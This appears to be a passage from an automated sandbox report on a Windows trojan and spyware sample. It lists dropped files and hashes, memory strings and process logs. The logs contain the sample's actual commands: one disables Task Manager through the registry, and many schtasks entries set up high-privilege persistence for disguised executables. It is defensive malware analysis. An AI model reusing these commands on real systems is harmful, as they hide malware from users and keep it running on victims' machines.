Source: cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: xu1yHoHXYs.33.dr	String found in binary or memory: https://support.mozilla.org
Source: xu1yHoHXYs.33.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: xu1yHoHXYs.33.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: cmd.exe, 00000021.00000002.2960240570.0000000013934000.00000004.00000800.00020000.00000000.sdmp, PKzrz8euGM.33.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: cmd.exe, 00000021.00000002.2960240570.000000001390F000.00000004.00000800.00020000.00000000.sdmp, PKzrz8euGM.33.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: cmd.exe, 00000021.00000002.2960240570.0000000013934000.00000004.00000800.00020000.00000000.sdmp, PKzrz8euGM.33.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: cmd.exe, 00000021.00000002.2960240570.000000001390F000.00000004.00000800.00020000.00000000.sdmp, PKzrz8euGM.33.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: xu1yHoHXYs.33.dr	String found in binary or memory: https://www.mozilla.org
Source: xu1yHoHXYs.33.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: xu1yHoHXYs.33.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: cmd.exe, 00000021.00000002.2960240570.000000001424F000.00000004.00000800.00020000.00000000.sdmp, xu1yHoHXYs.33.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: xu1yHoHXYs.33.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: cmd.exe, 00000021.00000002.2960240570.000000001424F000.00000004.00000800.00020000.00000000.sdmp, xu1yHoHXYs.33.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: C:\ProgramData\SoftwareDistribution\cmd.exe

Window created: window name: CLIPBRDWNDCLASS

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe

Code function: 0_2_00366FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00366FAA

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\CSCA9C827E8660941B2BE855526E0709AE4.TMP			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\SecurityHealthSystray.exe			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File deleted: C:\Windows\System32\CSCA9C827E8660941B2BE855526E0709AE4.TMP

Jump to behavior

Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_0036848E	0_2_0036848E
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_003700B7	0_2_003700B7
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_00374088	0_2_00374088
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_003640FE	0_2_003640FE
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_00377153	0_2_00377153
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_003851C9	0_2_003851C9
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_003632F7	0_2_003632F7
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_003762CA	0_2_003762CA
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_003743BF	0_2_003743BF
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_0036C426	0_2_0036C426
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_0036F461	0_2_0036F461
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_0038D440	0_2_0038D440
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_003777EF	0_2_003777EF
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_0036286B	0_2_0036286B
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_0038D8EE	0_2_0038D8EE
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_0036E9B7	0_2_0036E9B7
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_003919F4	0_2_003919F4
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_00376CDC	0_2_00376CDC
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_00373E0B	0_2_00373E0B
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_00384F9A	0_2_00384F9A
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_0036EFE2	0_2_0036EFE2
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Code function: 8_2_00007FFD9BAD0DA8	8_2_00007FFD9BAD0DA8
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Code function: 8_2_00007FFD9BC942C0	8_2_00007FFD9BC942C0
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Code function: 8_2_00007FFD9BC8000A	8_2_00007FFD9BC8000A
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Code function: 8_2_00007FFD9BC93468	8_2_00007FFD9BC93468
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Code function: 32_2_00007FFD9BAD0DA8	32_2_00007FFD9BAD0DA8
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Code function: 32_2_00007FFD9BB19046	32_2_00007FFD9BB19046
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Code function: 32_2_00007FFD9BB19002	32_2_00007FFD9BB19002
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Code function: 32_2_00007FFD9BB23CD6	32_2_00007FFD9BB23CD6
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Code function: 32_2_00007FFD9BAEAA0D	32_2_00007FFD9BAEAA0D
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Code function: 32_2_00007FFD9BAEC3DD	32_2_00007FFD9BAEC3DD
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Code function: 32_2_00007FFD9BAEBF5C	32_2_00007FFD9BAEBF5C
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Code function: 32_2_00007FFD9BAEC182	32_2_00007FFD9BAEC182
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Code function: 32_2_00007FFD9BAEC135	32_2_00007FFD9BAEC135
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 34_2_00007FFD9BAB0DA8	34_2_00007FFD9BAB0DA8
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 35_2_00007FFD9BAA0DA8	35_2_00007FFD9BAA0DA8
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Code function: 36_2_00007FFD9BA90DA8	36_2_00007FFD9BA90DA8
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 38_2_00007FFD9BAA0DA8	38_2_00007FFD9BAA0DA8
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 38_2_00007FFD9BAE9002	38_2_00007FFD9BAE9002
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 38_2_00007FFD9BAE9046	38_2_00007FFD9BAE9046
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 38_2_00007FFD9BAF8F35	38_2_00007FFD9BAF8F35
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 38_2_00007FFD9BAF3CD6	38_2_00007FFD9BAF3CD6
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 38_2_00007FFD9BABAA0D	38_2_00007FFD9BABAA0D
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 38_2_00007FFD9BABC3DD	38_2_00007FFD9BABC3DD
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 38_2_00007FFD9BABBF59	38_2_00007FFD9BABBF59
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 38_2_00007FFD9BABC182	38_2_00007FFD9BABC182
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 38_2_00007FFD9BABC135	38_2_00007FFD9BABC135
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 39_2_00007FFD9BAC0DA8	39_2_00007FFD9BAC0DA8
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 41_2_00007FFD9BB09046	41_2_00007FFD9BB09046
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 41_2_00007FFD9BB09002	41_2_00007FFD9BB09002
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 41_2_00007FFD9BB18F35	41_2_00007FFD9BB18F35
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 41_2_00007FFD9BB13CD6	41_2_00007FFD9BB13CD6
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 41_2_00007FFD9BADAA0D	41_2_00007FFD9BADAA0D
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 41_2_00007FFD9BADC3DD	41_2_00007FFD9BADC3DD
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 41_2_00007FFD9BADBF5C	41_2_00007FFD9BADBF5C
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 41_2_00007FFD9BADC182	41_2_00007FFD9BADC182
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 41_2_00007FFD9BADC135	41_2_00007FFD9BADC135
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 41_2_00007FFD9BAC0DA8	41_2_00007FFD9BAC0DA8
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 44_2_00007FFD9BB09046	44_2_00007FFD9BB09046
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 44_2_00007FFD9BB09002	44_2_00007FFD9BB09002
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 44_2_00007FFD9BB18F35	44_2_00007FFD9BB18F35
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 44_2_00007FFD9BB13CD6	44_2_00007FFD9BB13CD6
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 44_2_00007FFD9BAC0DA8	44_2_00007FFD9BAC0DA8
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 44_2_00007FFD9BADAA0D	44_2_00007FFD9BADAA0D
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 44_2_00007FFD9BADC3DD	44_2_00007FFD9BADC3DD
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 44_2_00007FFD9BADBF5C	44_2_00007FFD9BADBF5C
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 44_2_00007FFD9BADC182	44_2_00007FFD9BADC182
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 44_2_00007FFD9BADC135	44_2_00007FFD9BADC135

Source: Joe Sandbox View	Dropped File: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe FE7E66E8973A0886B54BAD8CD02A72B2FC81312DB742AB3E5C56919226D96A69
Source: Joe Sandbox View	Dropped File: C:\ProgramData\SoftwareDistribution\cmd.exe FE7E66E8973A0886B54BAD8CD02A72B2FC81312DB742AB3E5C56919226D96A69
Source: Joe Sandbox View	Dropped File: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe FE7E66E8973A0886B54BAD8CD02A72B2FC81312DB742AB3E5C56919226D96A69

Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: String function: 0037EB78 appears 39 times
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: String function: 0037F5F0 appears 31 times
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: String function: 0037EC50 appears 56 times

Source: RCtfAzVO.log.8.dr

Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: kJrNOFEGbQ.exe

Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs kJrNOFEGbQ.exe

Source: kJrNOFEGbQ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@51/81@0/1

Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe

Code function: 0_2_00366C74 GetLastError,FormatMessageW,

0_2_00366C74

Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe

Code function: 0_2_0037A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_0037A6C2

Source: C:\hyperComponentFontDhcp\Mscommon.exe

File created: C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe

Jump to behavior

Source: C:\hyperComponentFontDhcp\Mscommon.exe

File created: C:\Users\user\Desktop\RCtfAzVO.log

Jump to behavior

Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5996:120:WilError_03
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\601e15a90bb00257f7c6912c3a0b56596eff0ce41f53b8f0d11a89075dccd10c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7232:120:WilError_03

Source: C:\hyperComponentFontDhcp\Mscommon.exe

File created: C:\Users\user\AppData\Local\Temp\flsapel1

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\hyperComponentFontDhcp\XvQn4w4rSFjKx2xId8OEvj2iij2aJuA.bat" "

Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Command line argument: sfxname	0_2_0037DF1E
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Command line argument: sfxstime	0_2_0037DF1E
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Command line argument: STARTDLG	0_2_0037DF1E
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Command line argument: xz;	0_2_0037DF1E

Source: kJrNOFEGbQ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: kJrNOFEGbQ.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 3kIFDem3qM.33.dr, KkWX4W0WBB.33.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: kJrNOFEGbQ.exe

ReversingLabs: Detection: 73%

Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe

File read: C:\Users\user\Desktop\kJrNOFEGbQ.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\kJrNOFEGbQ.exe "C:\Users\user\Desktop\kJrNOFEGbQ.exe"
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\hyperComponentFontDhcp\uNXdwfIAGKhvsyaDygZbv1al18Fwyj4InpwIf.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\hyperComponentFontDhcp\XvQn4w4rSFjKx2xId8OEvj2iij2aJuA.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\hyperComponentFontDhcp\Mscommon.exe "C:\hyperComponentFontDhcp/Mscommon.exe"
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /f
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /rl HIGHEST /f
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /rl HIGHEST /f
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDDA4.tmp" "c:\Windows\System32\CSCA9C827E8660941B2BE855526E0709AE4.TMP"
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYz" /sc ONLOGON /tr "'C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYz" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 11 /tr "'C:\Windows\crx\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYz" /sc ONLOGON /tr "'C:\Windows\crx\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 8 /tr "'C:\Windows\crx\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 10 /tr "'C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYz" /sc ONLOGON /tr "'C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 13 /tr "'C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qxQMjDgg8i.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
